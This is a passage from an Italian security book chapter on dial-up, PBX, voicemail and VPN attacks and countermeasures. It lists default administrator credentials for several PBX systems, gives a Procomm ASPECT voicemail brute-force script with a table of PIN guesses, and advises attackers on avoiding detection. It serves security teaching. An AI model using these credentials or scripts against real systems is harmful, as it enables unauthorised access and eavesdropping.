menti da verificare a proposito della sicurezza telefonica della vostra organizzazio- 
ne. L’elenco è ordinato per difficoltà di implementazione degli interventi, dal più 
semplice al più difficile, in modo che possiate assolvere l’obiettivo più accessibile, il 
Low Hanging Fruit, per primo e impostare successivamente le iniziative maggior- 
mente consistenti. I lettori più attenti noteranno quanto questo elenco somigli a un 
programma per la sicurezza delle connessioni telefoniche. 
1. Censite le linee di connessione telefonica esistenti. Come fare a censirle tutte? 
Che domanda: con il wardialing! Eliminate tutte le connessioni non autorizzate. 


2. Concentrate tutta la connettività via telefono su un unico gruppo di modem 
centralizzato, localizzato all’esterno della rete privata su una connessione 
non “trusted”, e utilizzate tecnologie di intercettazione delle intrusioni e 
firewall per limitare e controllare le connessioni alle subnet affidabili. 


3. Rendete più complicato identificare le linee analogiche: cercate di separarle 
dai numeri aziendali ed evitate di esporle nei dati di registrazione del nome 
di dominio presso la InterNIC. Proteggete con una password l’accesso alle 
informazioni sul vostro account presso la compagnia telefonica. 
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4. Verificate che gli armadi contenenti le apparecchiature per telecomunica- 
zioni siano fisicamente sicuri. Molte aziende usano armadi privi di serrature 
in zone accessibili al pubblico. 

5. Verificate periodicamente le registrazioni effettuate dai programmi di ge- 
stione dell’accesso telefonico, cercando riferimenti a tentativi di connessio- 
ne falliti, attività notturna e sequenze di utilizzo sospette. Se possibile, regi- 
strate i numeri di origine delle chiamate. 

6. Importante e semplice al tempo stesso: disattivate eventuali banner stan- 
dard attivi sulle linee dati, sostituendoli con richieste di login meno identifi- 
cabili. Valutate anche la possibilità di visualizzare un avvertimento sulla pu- 
nibilità dell'utilizzo senza autorizzazione. 

7. Richiedete sistemi di autenticazione a due fattori (two-factor) per tutti i canali 
di accesso remoto. L’autenticazione a due fattori prevede che, per ottenere 
l’accesso al sistema, gli utenti presentino due diverse credenziali. Un esempio 
possono essere i gettoni SecurID della Security Dynamics Technologies, Inc., 
che definiscono una password usa e getta. Sappiamo che, nonostante sembri 
facile, spesso questa soluzione è improponibile dal punto di vista logistico o 
finanziario! Tuttavia, non esistono altri meccanismi in grado di eliminare pra- 
ticamente tutti i problemi che abbiamo descritto finora. 

8. Richiedete l'autenticazione per il dial-back, che è un meccanismo per cui il si- 
stema di accesso remoto viene configurato in modo da riagganciare, dopo 
aver ricevuto una chiamata, e chiamare subito dopo un numero predefinito (a 
cui ci si aspetta che risponda l’autore della prima chiamata). Per maggiore si- 
curezza, abilitate al dial-back una batteria di modem a parte e impedite l’ac- 
cesso in ingresso a tali modem (utilizzando l'hardware dei modem o il sistema 
di telefonia). Anche questa è una soluzione poco pratica, specie per le grandi 
aziende contemporanee, in cui aumenta l’incidenza degli utenti mobili. 

9. Assicuratevi che l'help desk aziendale sia al corrente di quanto possa essere 
delicato elargire o riazzerare le credenziali per l’accesso remoto. Basta un 
nuovo assunto eccessivamente zelante per vanificare ogni impegno a favo- 
re della sicurezza. 

10. Centralizzate la fornitura di connettività dial-up, dai fax ai sistemi di messag- 
gistica vocale, riconducendola fisicamente in un'unica area organizzativa 
particolarmente motivata in tema di sicurezza. 

11. Fissate regole precise sulla disponibilità ai dipendenti di questo servizio inter- 
no, in modo che anche per l'aggiunta di una linea POTS (Plain Old Telephone 
Service) sia richiesta un’approvazione dall’alto. Se riuscite a giustificarlo, fate 
in modo che quella linea consenta solo chiamate in uscita, se tutto quello che 
serve è inviare fax o accedere a BBS esterne e simili. Inoltre fate in modo che 
il management sponsorizzi attivamente questa politica e assicuratevi che ab- 
bia la forza di farla rispettare. In caso contrario, tornate al punto 1 e dimostrate 
la quantità di varchi che si riesce a trovare con un semplice giro di wardialing. 

12. Tornate al passo 1. Le politiche chiare sono un buon punto di partenza, ma 
l'unico modo per essere sicuri che nessuno le stia aggirando è eseguire pe- 
riodicamente dei wardialing. Il nostro consiglio è di ripeterli almeno ogni 
sei mesi per aziende con più di 10.000 linee telefoniche, ma una frequenza 
maggiore non farebbe male a nessuno. 

Vedete? Con il nostro piano in 12 punti è facile farsi passare il vizio delle connessio- 

ni telefoniche. Certamente, alcuni di questi passi non sono di semplice implementa- 

zione, ma riteniamo che una buona dose di paranoia sia del tutto giustificata. Gli 
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anni di esperienza passati a esaminare la sicurezza di grandi aziende ci hanno inse- 
gnato che la maggior parte di queste è ben protetta dai propri firewall su Internet; il 
più delle volte, invece, si trovano voragini nelle linee telefoniche POTS che portano 
dritte al cuore dell’infrastruttura informatica della società, Lo ripetiamo per l’ennesi- 
ma volta: dichiarare guerra ai vostri modem potrebbe essere il passo fondamentale 
per migliorare la sicurezza della vostra rete. 


Hacking dei centralini 


Sul mercato sono ancora presenti connessioni di accesso remoto a centralini. Que- 
ste connessioni rimangono a tutt'oggi il metodo più utilizzato per la gestione di un 
centralino. Quella che era una console cablata al centralino è ora diventata una 
macchina sofisticata accessibile attraverso reti IP e interfacce client. Detto questo, è 
bene però sottolineare che molte delle connessioni di accesso remoto ai centralini 
più noti sono rimaste arretrate da un punto di vista tecnologico. Inoltre, spesso i 
produttori di centralini richiedono ai clienti l’accesso al sistema da una postazione 
remota per gli interventi tecnici. Anche se questa richiesta potrebbe essere legittima, 
molte aziende gestiscono questa connessione in maniera non adeguata, consenten- 
do a un modem di restare sempre acceso e connesso al centralino. 

In realtà, in caso di problemi, le aziende dovrebbero prima chiamare il supporto tec- 
nico e poi, se il produttore lo richiede, attivare una connessione remota al centralino 
assicurandosi di disattivarla al termine dell'intervento. Poiché molte aziende lasciano 
questa connessione costantemente attiva, una sessione di wardialing produrrebbe 
delle schermate dall'aspetto curioso, come vedremo tra breve. L'hacking dei centralini 
segue la stessa strada percorsa per l’hacking delle connessioni telefoniche. 


n 


® Octel Voice Network Login 


Diffusione: 5 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 6 


I centralini Octel richiedono che la password dell'amministratore sia un numero. Qual- 
che volta questi sistemi possono essere proprio di grande aiuto! In molti sistemi Octel, 
l'impostazione predefinita della casella postale dell'amministratore di sistema è 9999: 


XX-Feb-XX 05:03:56 *91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM 
Welcome to the Octel voice/data network. 


All network data and programs are the confidential and/or proprietary 
property 

of Octel Communications Corporation and/or others. Unauthorized use, 
copying, 

downloading, forwarding or reproduction in any form by any person of any 
network data or program is prohibited. 


Copyright (C) 1994-1998 Octel Communications Corporation. All Rights 
Reserved. 
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Please Enter System Manager Password; 
Number must be entered 
Enter the password of either System Manager mailbox, then press "Return." 


9 Centralini Williams/Northern Telecom 


Diffusione: 5 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 6 


Se vi imbattete in un centralino Williams/Northern Telecom, viene visualizzato 
qualcosa di simile a quanto riportato di seguito. Digitando login al prompt dei co- 
mandi viene in genere richisto di inserire un numero utente di primo livello, avente 
un codice di accesso numerico di sole quattro cifre. Ovviamente, un attacco a forza 
bruta su un codice di questo tipo non richiede molto tempo: 


XX-Feb-XX 04:03:56 *91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM 


OVL111 IDLE 0 


> 
OVL111 IDLE 0 
> 
OVL111 IDLE ® 
> 


OVL111 IDLE ® 


\ 


® Meridian Links 


Diffusione: 5 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 6 


A prima vista, un sistema Meridian assomiglia più a una macchina UNIX che a qualun- 
que altra cosa, dal momento che molte delle interfacce di gestione usano un’applica- 
zione generica di shell per l’amministrazione del centralino. In base a come è configu- 
rato il sistema, esiste la possibilità di uscire da questa shell e di curiosare in giro: per 
esempio, se non sono stati disabilitati il nome utente e la password, sarebbe possibile 
accedere alla console di gestione del sistema. I] solo modo per verificare se esiste que- 
sta possibilità è quello di provare il nome utente e la password predefiniti. Potrebbero 
funzionare le combinazioni predefinite, come utente maint e maint come password; 
nel sistema potrebbe esistere anche la combinazione utente mluser e password mluser; 


XX-Feb-XX 02:04:56 *91XXX5551234 C: CONNECT 9600/ARO/V32/LAPM 


login: 
login: 
login: 
login: 
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E) ROLM PhoneMail 


Diffusione: 5 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 6 


Se vi imbattete in un sistema che ha l’aspetto riportato di seguito, probabilmente si 
tratta di un sistema ROLM PhoneMail di vecchia generazione. Questo potrebbe an- 
che essere confermato dal banner che viene visualizzato: 


XX-Feb-XX 02:04:56 *91XXX5551234 C: CONNECT 9600/ARQ/V32/LAP 


PM Login> 
Illegal Input. 


Di seguito potete trovare i nomi utente e le password predefinite del sistema ROLM 
PhoneMail: 


LOGIN: sysadmin PASSWORD: sysadmin 
LOGIN: tech PASSWORD: tech 
LOGIN: poll PASSWORD: tech 


® ATT Definity G/System 75 


Diffusione: 5 
Semplicità: Di 
Impatto: 8 
Fattore di rischio: 6 


ATT Definity System 75 è uno dei centralini più vecchi in circolazione e il prompt di 
accesso assomiglia molto a quello UNIX. Talvolta, viene anche visualizzato il banner: 


ATT UNIX S75 
Login: 
Password: 


Di seguito, potete trovare l'elenco dei nomi utente e delle password predefinite per la 
vecchia distribuzione System 75. Come impostazione predefinita, AT&T includeva nella 
distribuzione un grande numero di nomi utente e password già installate e pronte per 
essere utilizzate. Di solito i proprietari modificano gli account personali 0 per buon sen- 
so 0 perché costretti dalla politica di gestione delle password stabilita dall'azienda. Tal- 
volta accade che questi stessi account predefiniti vengano reinstallati in occasione di ag- 
giornamenti del sistema. Di conseguenza, anche se l'installazione originale assicurava 
una rapida modifica delle password, un aggiornamento o una serie di aggiornamenti 
potrebbero aver ripristinato le password predefinite. Ecco l’elenco dei nomi utente e 
password predefiniti conosciuti del System 75, inclusi in ogni distribuzione Definity G: 


Login: enquiry Password: enquirypw 
Login: init Password: initpw 
Login: browse Password: looker browsepw 
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Login: maint Password: rwmaint maintpw 

Login: locate Password: locatepw 

Login: rcust Password: rcustpw 

Login: tech Password: field 

Login: cust Password: custpw 

Login: inads Password: inads indspw inadspw 
Login: support Password: supportpw 

Login: bcms Password: bcms 

Login: bems Password: bcempw 

Login: bcnas Password: bcenspw 

Login: bcim Password: bcimpw 

Login: bciim Password: bciimpw 

Login: bcnas Password: benspw 

Login: craft Password: craftpw cerftpw crack 
Login: blue Password: bluepw 

Login: field Password: support 

Login: kraft Password: kraftpw 

Login: nms Password: nmspw 


® PBX protetti da ACE/Server 


Diffusione: 5 
Semplicità: 5 
Impatto: 8 
Fattore di rischio: 6 


Se vi imbattete in un prompt di sistema del tipo riportato di seguito, date solo un'oc- 
chiata e lasciate perdere perché molto probabilmente non sarete in grado di scon- 
figgere il meccanismo di difesa utilizzato per proteggerlo. È previsto un protocollo 
di autenticazione challenge/response con l’utilizzo di un token: 


XX-Feb-XX 02:04:56 *91XXX5551234 C: CONNECT 9600/ARQ/V32/LAPM 


Hello 
Password : 
89324123 : 


Hello 
Password : 
65872901 


© Contromisure agli attacchi ai PBX 


Come nel caso delle contromisure per l’hacking delle connessioni telefoniche, assicu- 
ratevi di ridurre il tempo in cui il modem rimane acceso, sviluppate più forme di au- 
tenticazione, per esempio l'autenticazione a due vie (se possibile), e adottate sempre 
una qualche forma di blocco dell'utente in caso di tentativi di accesso falliti ripetuti. 


Attacchi ai sistemi di messaggistica vocale 


Vi siete mai domandati come gli hacker possano accedere ai sistemi di messaggisti- 
ca vocale? Avete saputo di un licenziamento o di una fusione prima che essi avve- 
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nissero realmente? Cercare di inserirsi nelle caselle vocali è una delle pratiche più 
vecchie: in un'azienda nessuno ne è immune, e soprattutto i CxOs sono a rischio. 


‘® Attacchi ai sistemi di messaggistica 
vocale con il metodo della forza bruta 


Diffusione: 2 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 6 


All'inizio degli anni ‘90 sono stati scritti due programmi per l'attacco ai sistemi di 
messaggistica vocale: Voicemail Box Hacker 3.0 e VrACK 0.51. In passato abbiamo 
provato a utilizzare questi strumenti, che erano stati pensati principalmente per si- 
stemi di messaggistica vocale molto più vecchi e meno sicuri. Il programma Voice- 
mail Box Hacker consente l'attacco solo a caselle vocali di quattro cifre e nelle ver- 
sioni da noi utilizzate non era espandibile. Il programma VrACK dispone di alcune 
funzionalità interessanti, ma è difficile da programmare, essendo stato scritto per 
macchine basate sulla vecchia architettura x.86; inoltre, presenta problemi di stabili- 
tà se utilizzato sulle piattaforme di nuova generazione. Entrambi i programmi non 
sono stati ulteriormente supportati a causa della relativa impopolarità degli attacchi 
alle caselle vocali, pertanto gli aggiornamenti non sono mai stati sviluppati. Gli at- 
tacchi ai sistemi di messaggistica vocale ci danno la possibilità di utilizzare nuova- 
mente il nostro fidato linguaggio di scripting ASPECT. 

È possibile attaccare le caselle vocali, utilizzando degli script ASPECT simili a quelli 
illustrati per gli attacchi alle connessioni telefoniche e cambiano solo le ipotesi di 
partenza. Oltre a utilizzare il metodo di script, è necessario rimanere in ascolto in at- 
tesa di un evento andato a buon fine. Si tratta quindi di un tipo di attacco manuale, 
in cui è richiesta la presenza costante dell’hacker, e basato sull'utilizzo di password 
o combinazioni di password molto semplici. 

Per cercare di manomettere un sistema di messaggistica vocale manualmente, 0 
programmando uno script di attacco per forza bruta (senza ricorrere a nozioni di in- 
gegneria sociale), sono necessari i seguenti componenti: il numero principale di ac- 
cesso al sistema, una casella vocale del sistema target con il numero di cifre richie- 
sto (in genere tre, quattro o cinque) e un'ipotesi plausibile sulla lunghezza minima 
e massima della password delle caselle vocali. Nella maggior parte delle organizza- 
zioni moderne, è possibile determinare ipotesi sulla sicurezza dei sistemi di messag- 
gistica vocale. Queste ipotesi riguardano principalmente la lunghezza minima e 
massima delle password e le password predefinite del sistema. I responsabili della 
sicurezza di un'azienda sarebbero pazzi a non implementare nemmeno un livello 
minimo di sicurezza. Ipotizziamo che sia stato definito un livello minimo di sicurez- 
za e che le caselle vocali dell'azienda obiettivo dispongano di password di accesso. 
Lasciamo che lo script abbia inizio. 

Il nostro scopo è creare qualcosa di simile al semplice script riportato di seguito. Per 
prima cosa analizziamo ciò che vogliamo ottenere dallo script. Quello che segue è un 
semplice esempio di script che compone il numero della casella vocale del sistema, 
attende il messaggio di saluto del responsabile automatico (qualcosa del tipo: “Benve- 
nuti nel sistema di messaggistica vocale della società X. Vi preghiamo di inserire il nu- 
mero della casella vocale”), digita il numero della casella vocale, inserisce una pass- 
word, preme un tasto di conferma e ripete di nuovo la sequenza delle operazioni. In 


360 Capitolo 8 


questo esempio, vengono provate sei password sulla casella vocale 5019. Con un po’ 
di abilità e fantasia, potete facilmente creare uno script che esegua questa sequenza di 
operazioni ripetutamente su un dizionario di numeri a vostra scelta. È molto probabi- 
le che dobbiate adattare lo script alle caratteristiche del modem; del resto, lo stesso 
script può andar bene su un sistema, ma male su un altro. Pertanto è fondamentale ri- 
manere in ascolto dello script durante la sua esecuzione e prestare attenzione al pro- 
cesso. Una volta creato il prototipo del programma, è possibile utilizzare un diziona- 
rio di numeri molto più esteso, come vedremo tra breve. 


Listato 8.9 Semplice script di attacco a un sistema di messaggistica vocale 
scritto nel linguaggio Procomm Plus ASPECT 


ASP/WAS script for Procomm Plus Voicemail Hacking 
‘Written by M4phrik, www.m4phr1k.com, Stephan Barnes 


proc main 

transmit "atdt*918005551212,,,,,5019#,111111#,,5019#,222222#,," 
transmit “°M" 

WAITQUIET 37 

HANGUP 

transmit "atdt*918005551212,,,,,5019#,333333#, ,5019#,555555#,," 
transmit "*M" 

WAITQUIET 37 

HANGUP 

transmit "atdt*918005551212,,,,,5019#,666666#, ,5019#,777777#,," 
transmit "°M" 

WAITQUIET 37 

HANGUP 

endproc 


La buona notizia relativa alle password delle caselle nei sistemi di messaggistica voca- 
le è che sono solo numeriche; pertanto, esiste un numero finito di numeri che posso- 
no essere provati. Il numero di combinazioni possibili dipende dalla lunghezza massi- 
ma della password. Più lunga è la password, maggiore è, in teoria, il tempo necessario 
per accedere alla casella vocale. Anche in questo caso, lo svantaggio di questo proces- 
so è che si tratta di un attacco manuale che richiede che qualcuno rimanga in ascolto 
per tutta la durata della sessione. I più furbi potrebbero pensare di registrare su nastro 
l’intera sessione e riascoltarla in seguito, o ricercare anomalie nei processi eseguiti dal 
DSP. Indipendentemente dal metodo utilizzato, dovrete valutare eventuali anomalie 
pianificando le azioni successive ai tentativi falliti. Il messaggio vocale che segnala 
l'avvenuto accesso al sistema è in genere del tipo “Avete X nuovi messaggi, Menu 
principale ...”. Ciascun sistema di messaggistica vocale dispone di responsabili autò- 
matici diversi e, se non si ha familiarità con lo specifico responsabile automatico del 
sistema target, potreste non sapere cosa aspettarvi come messaggio di risposta. Ma 
non rifuggite questo metodo: ricordate che siete in ascolto di un'anomalia tra un insie- 
me di tentativi falliti. Osservate i risultati di un attacco a forza bruta compiuto sull’in- 
tervallo di numeri compreso tra 000000 e 999999 e vedrete che il tempo richiesto per 
portare a termine l’intero processo è notevole e aumenta con l'aggiunta di una nuova 
cifra. Altri metodi potrebbero essere utili per ridurre il tempo richiesto per il test. 

Cosa possiamo fare per ridurre la durata dell’attacco? Un metodo è utilizzare caratteri 
(numeri) che la gente ricorda facilmente. La tastiera numerica del telefono è una fonte 
inesauribile di sequenze numeriche a causa del suo design squadrato. Gli utenti po- 
trebbero scegliere password che riproducono sulla tastiera una Z, 1235789. Detto 
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questo, nella Tabella 8.1 proponiamo un elenco di sequenze numeriche ricavate 
dall'’osservazione della tastiera numerica del telefono. Ovviamente non si tratta di un 
elenco completo, ma è comunque un buon punto di partenza. Ricordate anche di 
provare le possibilità più ovvie, come per esempio una password identica al numero 
della casella vocale o sequenze ripetitive di caratteri, come “111111”, che potrebbero 
essere utilizzate come password temporanee. Gli obiettivi in grado di fornire informa- 
zioni più preziose sono quelli che hanno già installato delle caselle vocali, alcune del- 
le quali non sono mai state utilizzate. Non ha molto senso accedere a caselle che de- 
vono ancora essere configurate, a meno che non siate un revisore che sta cercando di 
far adottare agli utenti del sistema delle norme di sicurezza più rigorose. 


Tabella 8.1 Password per il testing delle caselle vocali 


Modelli di sequenze 

123456 234567 
345678 456789 
567890 678901 
789012 890123 
901234 012345 
654321 765432 
876543 987654 
098765 109876 
210987 321098 
432109 543210 
123456789 987654321 
Sequenze 

147741 258852 
369963 963369 
159951 123321 
456654 789987 
987654 123369 


147789 357753 
1235789 9875321 


115599 
995511 


1478963 
7412369 
1236987 
3214789 


14789 
78963 
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Tabella 8.1 (Continua) Password per il testing delle caselle vocali 


Angolo 7] 12369 
Angolo [7 32147 

0 di origini diverse 

147896321 963214789 
478963214 632147896 
789632147 321478963 
896321478 214789632 
X di origini diverse 

159357 753159 
357159 951357 
159753 357951 
+ di origini diverse 

258456 654852 
258654 654258 
456258 852456 
456852 852654 
Z di origini diverse 

1235789 3215987 
9875321 7895123 
Dall’alto 

Salto 172839 
Salto 1 283917 
Salto 2 391728 
Inverso 

Salto 392817 
Salto 1 281739 
Salto 2 173928 
Dal basso 

Salto 718293 
Salto 1 829371 
Salto 2 937182 
Inverso 

Salto 938271 
Salto 1 827193 
Salto 2 719382 
Sinistra/destra 

Salto 134679 
Salto 1 467913 
Salto 2 791346 
Destra/sinistra 

Salto 316497 
Salto 1 649731 


Salto 2 973164 
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Dopo aver manomesso un sistema, fate attenzione a non modificare nulla. La modifica 
della password di una casella potrebbe destare dei sospetti, a meno che il servizio 
venga utilizzato poco dall’utente in questione o l’utente stesso si trovi in vacanza. 
Sono rari i casi di società che hanno adottato una politica di modifica delle password 
delle caselle vocali ogni X giorni, come nel caso dei sistemi di computer. Pertanto, una 
volta che è stata impostata è molto difficile che la password venga modificata in segui- 
to, Poiché ascoltare i messaggi degli altri potrebbe portare diritto in prigione, non è 
nostra prassi consigliare questo metodo di accesso a un sistema di messaggistica voca- 
le. Come al solito, ci limitiamo a esporre gli aspetti teorici dei metodi di attacco. 

Infine, questo metodo di attacco a forza bruta potrebbe trarre beneficio dall’automazio- 
ne dell’ascolto dell’anomalia. Abbiamo ipotizzato che se la voce venisse catturata da un 
dispositivo DSP (Digita! Signal Processing) o se un programma di tipo speak-and-type 
fosse opportunamente addestrato e messo in ascolto dell’anomalia, si potrebbe evitare 
la seccatura di doversi sedere e restare in ascolto mentre lo script viene eseguito. 


Contromisure agli attacchi ai sistemi 
di messaggistica vocale con il metodo della forza bruta 


Rafforzate le misure di sicurezza dei sistemi di messaggistica vocale. Per esempio, 
prevedete un blocco dell’accesso al sistema, dopo un certo numero di tentativi falliti 
in modo da stroncare i tentativi di attacco a forza bruta. 


Hacking delle VPN 


Grazie alla stabilità e alla capillarità della rete telefonica, la connettività POTS resterà 
con noi ancora per parecchio tempo. Tuttavia, il gran magma della tecnologia ha già 
lasciato intravedere il meccanismo che sostituirà le connessioni telefoniche come si- 
stema di accesso remoto: le reti private virtuali VPN (Virtual Private Network). 

Il concetto di VPN non è legato a una particolare tecnologia o protocollo, ma la 
maggior parte delle sue implementazioni pratiche comporta il “tunneling” dei dati 
privati su Internet, eventualmente cifrati. I principali punti di forza delle VPN sono i 
bassi costi e la comodità: sfruttando le connessioni a Internet esistenti per le comu- 
nicazioni tra sedi, utenti o persino partner (extranet) remoti, è possibile ridurre sen- 
sibilmente gli ingenti costi e la complessità delle infrastrutture WAN classiche (linee 
telefoniche dedicate e batterie di modem). 

Esistono diverse tipologie di rete VPN, dalla Secure Shell (SSH) open source alle tipolo- 
gie proprietarie come SecureRemote di Check Point Software che, in base alle esigenze 
dell’utente e alle necessità reali, permette di avviare una sessione cifrata con il firewall. 
Per poter fare questo SecureRemote deve sapere quali host potranno comunicare con 
quello cifrato e deve conoscere le chiavi di crittografia, cercando di effettuare il fatching 
del sito dal server remoto. L’autenticazione viene effettuata non appena SecureRemote 
stabilisce che il traffico verso il firewall deve essere cifrato, e può essere effettuata me- 
diante una semplice password, una SKEY, un SecurID oppure un certificato: quello che 
è importante è che tutto il traffico dati tra il firewall e il client sia sempre cifrato, e che la 
password (per quanto semplice) non venga in alcun modo divulgata. 

Le due tecniche più diffuse per le VPN sono la bozza di standard IPSec UP Security) 
e il protocollo L2TP (Layer 2 Tunneling Protocol), che sostituisce precedenti tentati- 
vi noti come PPTP (Point-to-Point Tunneling Protocol) e L2F (Layer 2 Fonwarding). 
La descrizione delle specifiche tecniche di queste complesse tecnologie va ben oltre 
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gli obiettivi di questo libro, per cui invitiamo chi fosse interessato a consultare su In- 
ternet i relativi documenti in bozza (http://ww.ietf.org). 

In breve, il tunmneling consiste nell’incapsulamento di un datagramma, eventual- 
mente cifrato, all’interno di un altro, che si tratti di IP all’interno di IP (IPSec), o di 
PPP in GRE (PPTP). La Figura 8.7 rappresenta il concetto di tunneling su una VPN 
elementare tra due entità A e B (che potrebbero essere singoli host o intere reti). B 
invia un pacchetto ad A (indirizzo di destinazione “A”) passando dal Gateway 2 
(GW?2, che potrebbe essere uno strato software su B). GW2 incapsula il pacchetto 
all'interno di un altro destinato al Gateway 1. GW1 rimuove l’intestazione tempora- 
nea e consegna il pacchetto originale ad A. Eventualmente, il pacchetto originale 
può essere cifrato durante l’attraversamento di Internet (linea tratteggiata). 


Internet 


== 


Eventuale cifratura 


Figura 8.7 


Il tunneling di un tipo di traffico all'interno di un altro è la premessa fondamentale 
delle reti private virtuali (VPN). 


Le tecnologie VPN sono notevolmente maturate nel corso degli ultimi anni e stanno 
procedendo velocemente verso l'integrazione con le architetture di rete sia pubbli- 
che sia private. Attualmente molte portanti offrono la gestione dei servizi VPN a co- 
loro che non desiderano realizzarli personalmente. Chiaramente, VPN è in grado di 
prendere il posto delle linee POTS, come prima scelta nelle comunicazioni remote. 
Questo suo nuovo stato la rende però anche l’obiettivo degli hacker più zelanti, che 
hanno bisogno di risalire la catena alimentare ora che gli obiettivi degli attacchi 
wardialing iniziano a esaurirsi. Come se la passerà la rete VPN quando sarà scrutata 
dall'occhio attento degli hacker? Di seguito vengono forniti alcuni esempi. 


® Microsoft PPTP 


Diffusione: ? 
Semplicità: 7 
Impatto: 8 
Fattore di rischio: 7 


Un buon esempio di analisi di questo tipo è la criptoanalisi dell'implementazione Mi- 
crosoft del protocollo PPTP, effettuata il 1° giugno 1998 dal celebre esperto di crittogra- 
fia Bruce Schneier e da un hacker di prima grandezza, Peter Mudge della LOpht Heavy 
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Industries (vedi http://ww.counterpane.com/pptp-paper.html). Potete trovare 

una panoramica tecnica su alcuni dei risultati nel saggio scritto da Aleph One per 

Pbrack Magazine (http://www.phrack-dont-give-a-shit-about-dmca.org/show 

.php?p=53&a=12). Aleph One svela ulteriori informazioni su aspetti poco sicuri di PP- 

TP, tra cui la possibilità di sostituirsi a un server PPTP per ottenere le credenziali di au- 

tenticazione. È disponibile anche una versione del saggio originale rivista alla luce degli 

aggiustamenti apportati dalla Microsoft a PPTP nel 1998 (http://ww.counterpa- 
ne.com/pptpv2-paper.html). 

Nonostante il saggio sia dedicato alla specifica implementazione di PPTP effettuata 

da Microsoft, molte delle considerazioni sono di importanza fondamentale per le 

VPN in generale. Trattandosi di una tecnologia orientata alla sicurezza, la maggior 

parte delle persone si aspetta che la progettazione e l’implementazione della tecno- 

logia VPN che scelgono siano solide. Il saggio di Schneier e Mudge è un campanel- 
lo d’allarme per queste persone. In questa sede, ci limiteremo a illustrare alcuni dei 
punti più importanti (e preoccupanti) emersi. 

Nel leggere il saggio di Schneier e Mudge, è importante ricordare alcune premesse 

e l’ambiente di prova utilizzato. Innanzitutto, l’analisi è stata effettuata sull’intera- 

zione PPTP tra client e server, non su un'architettura gateway server-to-server. Si è 

poi ipotizzato che la connessione client avvenisse direttamente su Internet, e non 

per via telefonica. Inoltre, alcuni degli attacchi proposti si basano sul presupposto 

che sia possibile intercettare liberamente la sessione PPTP. Per quanto nessuna di 

queste condizioni influenzi pesantemente le conclusioni, è importante tener pre- 

sente che un hacker in grado di intercettare questo tipo di comunicazione ha già 
probabilmente superato la maggior parte delle difese. 

I risultati principali riferiti nel saggio sono i seguenti. 

e Il protocollo di autenticazione sicura di Microsoft, MS-CHAP, si basa su fun- 
zioni di crittografia di vecchia concezione, che sono già state sconfitte con 
relativa facilità (la debolezza dell'hash di LanManager è stata dimostrata e 
attaccata da LOphtcrack). 

e Alcuni componenti delle chiavi utilizzate all’interno di una sessione, per cifra- 
re i dati sulla rete, sono ricavati dalle password definite dall'utente e questo ri- 
duce la lunghezza effettiva delle chiavi al di sotto dei 40 e 128 bit dichiarati. 

e L'algoritmo di cifratura prescelto per la sessione (l'algoritmo simmetrico 
RC4 della RSA) risulta notevolmente indebolito per effetto del riutilizzo del- 
le chiavi di sessione sia in trasmissione sia in ricezione, che lo espone ai tra- 
dizionali attacchi crittografici. 

e Ilcanale di controllo (la porta TCP 1723), utilizzato per la negoziazione e la 
gestione delle connessioni, non è assolutamente autenticato ed è vulnerabi- 
le ad attacchi di tipo DoS (Denial of Service) e di spoofing. 

e Viene cifrato solo il traffico di dati e questo consente a un eventuale inter- 
cettatore di ricavare informazioni molto utili dall'analisi del traffico sul cana- 
le di controllo. 

e Unclient connesso a una rete attraverso un server PPTP potrebbe fare da 
backdoor per la rete stessa. 


Soluzione per PPTP 


Tutto questo può significare la fine per le VPN? Assolutamente no. Lo ripetiamo: 
queste osservazioni sono specifiche dell’implementazione PPTP di Microsoft, che 
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ha già rilasciato una patch per i client e server Windows NT con il Service Pack 4 
(originariamente pubblicata come un hotfix successivo a SP3). Per ulteriori infor- 
mazioni su questo aggiornamento, vi rimandiamo al Microsoft Security Bulletin 
MS98-012 (http://www.microsoft.com/technet/treeview/default.asp?url= 
/technet/security/bulletin/ms98-012.asp). Inoltre, il protocollo PPTP è stato 
notevolmente migliorato in Windows 2000 con la possibilità di utilizzare il proto- 
collo L2TP basato su IPSec. Sui client PPTP Win 9x occorrerebbe aggiornare il 
Dial-Up Networking alla versione 1.3, per ottenere la compatibilità con le più rigi- 
de misure di sicurezza disponibili sul lato server (potete trovare un collegamento 
a questa patch su http://www.microsoft.com/downloads/). 


DI Schneier e Mudge hanno pubblicato un saggio successivo, elogiando Micro- 


soft per aver affrontato in maniera esaustiva la maggior parte dei difetti ori- 
ginariamente identificati. Essi, tuttavia, fanno notare che MS PPIP si basa 
ancora sulla password data dall'utente per fornire entropia alla chiave di 
cifratura. 


La lezione più importante che si può ricavare dallo studio di Schneier e Mudge va 
letta tra le righe: ci sono in giro persone ingegnose che hanno tutte le intenzioni e i 
mezzi per violare le VPN, per quanto solida possa essere la loro corazza protettiva. 
Altri punti critici sono la potenziale vulnerabilità a lungo termine di alcuni aspetti 
delle VPN legati alle piattaforme o ai sistemi operativi (per esempio, il caso 
dell’hash di LanMan), oppure le semplici scelte di progettazione errate (per esem- 
pio, la mancanza di autenticazione sul canale di controllo, il riutilizzo delle chiavi di 
sessione con cifratura RC4) che minano alla base un sistema altrimenti sicuro. 
Questo è un interessante paradosso contenuto nel saggio di Schneier e Mudge: se da 
un lato tendono a denigrare l’implementazione Microsoft di PPTP, dall'altro dichiara- 
no (allineandosi all’ottimismo che aleggia nel settore) che IPSec diventerà la tecnolo- 
gia dominante per le VPN, soprattutto per il processo aperto e bilanciato di sviluppo 
(http://ww.counterpane.com/pptp-faq.html). Tuttavia, PPTP e le stesse esten- 
sioni proprietarie Microsoft sono disponibili pubblicamente come bozze su Internet 
(http://ww.ietf.org/html.charters/pppext-charter.html). Cosa rende tanto 
speciale IPSec? In una parola, niente. Sarebbe interessante se qualcuno rivolgesse si- 
mili attenzioni anche a IPSec. E quello che voi sapete lo deve sapere anche Bruce 
Schneier! 


Un’analisi pratica di IPSec 


Molti si sono spazientiti di fronte alla imperscrutabilità della bozza di standard IPSec 
(si veda più avanti); ma poiché Microsoft lo ha integrato in Windows 2000 è proba- 
bile che per un po’ di tempo non subirà alcuna modifica. C'è però anche un aspet- 
to positivo in tutto questo: poiché nessuno sembra comprendere il tipo di attività 
svolta da IPSec, sono pochi quelli che sanno come attaccarlo quando se lo trovano 
